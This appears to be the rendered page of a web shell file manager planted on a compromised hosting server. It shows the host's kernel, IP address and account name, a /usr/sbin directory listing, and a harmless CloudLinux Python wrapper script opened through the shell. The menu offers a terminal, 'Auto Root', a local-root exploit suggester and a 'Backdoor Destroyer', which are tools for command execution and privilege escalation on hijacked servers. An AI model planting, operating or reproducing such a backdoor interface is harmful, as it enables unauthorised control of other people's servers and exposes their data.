Linux s17.hosterpk.com 6.12.0-124.55.3.el10_1.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 7 16:54:02 EDT 2026 x86_64
LiteSpeed
Server IP : 192.169.89.90 & Your IP : 216.73.216.41
Domains :
Cant Read [ /etc/named.conf ]
User : hamzalar
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
sbin /
Delete
Unzip
Name
Size
Permission
Date
Action
cagefs_enter_site
1.83
KB
-rwxr-xr-x
2026-04-27 00:00
cagefsctl-user
14.41
KB
-rwxr-xr-x
2026-04-27 00:00
chroot
39.86
KB
-rwxr-xr-x
2026-01-15 00:00
cloudlinux-selector
654
B
-rwxr-xr-x
2026-04-16 00:00
consoletype
15.42
KB
-rwxr-xr-x
2024-10-29 00:00
cracklib-check
15.43
KB
-rwxr-xr-x
2024-10-29 00:00
cracklib-format
586
B
-rwxr-xr-x
2024-10-29 00:00
cracklib-packer
15.44
KB
-rwxr-xr-x
2024-10-29 00:00
cracklib-unpacker
15.42
KB
-rwxr-xr-x
2024-10-29 00:00
cracklib-update
1.16
KB
-rwxr-xr-x
2023-03-04 16:00
create-cracklib-dict
994
B
-rwxr-xr-x
2019-02-14 01:54
ddns-confgen
23.56
KB
-rwxr-xr-x
2026-03-27 00:00
exim
1.25
KB
-rwxr-xr-x
2026-05-01 00:00
faillock
23.48
KB
-rwxr-xr-x
2025-12-01 00:00
ip
795.11
KB
-rwxr-xr-x
2026-01-27 00:00
isolatectl
9.06
KB
-rwxr-xr-x
2026-05-14 00:00
ldconfig
914.23
KB
-rwxr-xr-x
2026-05-26 00:00
lvdctl
683
B
-rwxr-xr-x
2026-05-14 00:00
mkhomedir_helper
15.52
KB
-rwxr-xr-x
2025-12-01 00:00
named-checkzone
31.68
KB
-rwxr-xr-x
2026-03-27 00:00
named-compilezone
31.68
KB
-rwxr-xr-x
2026-03-27 00:00
pam_namespace_helper
471
B
-rwxr-xr-x
2025-12-01 00:00
pam_timestamp_check
15.45
KB
-rwxr-xr-x
2025-12-01 00:00
pluginviewer
19.73
KB
-rwxr-xr-x
2025-07-03 00:00
proxyexec
24.4
KB
-r-xr-xr-x
2025-08-12 17:54
pwhistory_helper
23.53
KB
-rwxr-xr-x
2025-12-01 00:00
saslauthd
88.66
KB
-rwxr-xr-x
2025-07-03 00:00
sasldblistusers2
15.62
KB
-rwxr-xr-x
2025-07-03 00:00
saslpasswd2
15.59
KB
-rwxr-xr-x
2025-07-03 00:00
sendmail
1.26
KB
-rwxr-xr-x
2026-05-01 00:00
testsaslauthd
15.51
KB
-rwxr-xr-x
2025-07-03 00:00
tmpwatch
35.68
KB
-rwxr-xr-x
2024-10-29 00:00
tsig-keygen
23.56
KB
-rwxr-xr-x
2026-03-27 00:00
unix_chkpwd
31.63
KB
-rwxr-xr-x
2025-12-01 00:00
unix_update
35.7
KB
-rwx------
2025-12-01 00:00
Save
Rename
#!/opt/cloudlinux/venv/bin/python3 -sbb # -*- coding: utf-8 -*- # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2025 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # https://cloudlinux.com/docs/LICENCE.TXT # """ Execute a command inside CageFS for a site (document root or domain). This wrapper provides a command-line interface for executing commands within the isolated CageFS environment for a specific website. """ import argparse import os import sys from clcagefslib.webisolation import libenter def create_parser(): """ Create argument parser for cagefs_enter_site. Returns: argparse.ArgumentParser: Configured argument parser """ parser = argparse.ArgumentParser( # the command is named with _underscores_ to match # existing cagefs_enter wrapper from lvewrappers prog="cagefs_enter_site", description="Execute a command inside CageFS for a site (document root or domain)", ) parser.add_argument("site", type=str, help="Document root or domain") parser.add_argument( "command", type=str, nargs=argparse.REMAINDER, help="Command to execute" ) return parser def main(): """ Main entry point. Returns: int: Exit code """ parser = create_parser() args = parser.parse_args() if not args.command: parser.error("COMMAND is required") try: return libenter.enter_site(args.site, args.command) except ValueError as e: print(f"Error: {e}", file=sys.stderr) return 1 except KeyboardInterrupt: # Clean Ctrl+C exit without traceback (exit code 130 = SIGINT). return 130 if __name__ == "__main__": if os.geteuid() == 0: print("Error: This program can not be run as root", file=sys.stderr) sys.exit(1) sys.exit(main())